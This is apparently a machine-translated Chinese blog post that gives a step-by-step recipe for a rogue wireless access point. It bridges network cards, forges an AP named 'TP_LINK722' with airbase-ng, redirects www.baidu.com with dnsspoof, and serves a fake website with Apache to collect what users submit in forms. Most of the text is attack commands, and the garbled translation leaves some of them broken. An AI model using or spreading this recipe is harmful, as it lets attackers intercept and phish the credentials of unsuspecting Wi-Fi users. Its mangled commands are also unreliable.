Hot forging process wireless AP, DNS hijacking

The first step: enter the Monitor mode (previous articles have explained)

Step two: Forged AP:

Bridging a wireless network card packages apt-get install bridge-utils

Adding Bridge brctl addbr bridge

First network connection card NIC is added to the bridge which brctl addif bridge eth0 # eth0 is connected to a network, may be wired or wireless network adapter card

To add your own fake AP to bridge wireless card inside brctl addif bridge at0 # at0 forged AP wireless network card

Clear the IP address of the network card ifconfig eth0 0.0.0.0 up 

Clear AP LAN IP address ifconfig at0 0.0.0.0 up 

Assign an IP address to the bridge interfaces ifconfig bridge 192.168.1.10 up

Add gateway route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.1.1

Start IP forwarding echo 1> / proc / sys / net / ipv4 / ip_forward

Forgery of AP: airbase-ng -c 11 --essid TP_LINK722 wla0mon # -c --essid designated channel to the AP wlan0mon use falsified card

The third step: DNS spoofing

dnsspoof -i bridge -f dnsspoof.hosts # -i -f bridge using deception to deceive the domain URL configuration files (the format of the configuration file can reference

/usr/share/dsniff/dnsspoof.hosts) example: 192.168.1.110 www.baidu.com Baidu the access request address forged steering native

And then start the service apachet2ctl start apach 

The following steps will fake website you want, fill out information such as the user submits the form:

 

 

 

 

 

发布了38 篇原创文章 · 获赞 10 · 访问量 10万+

Guess you like

Origin blog.csdn.net/winux123/article/details/103413180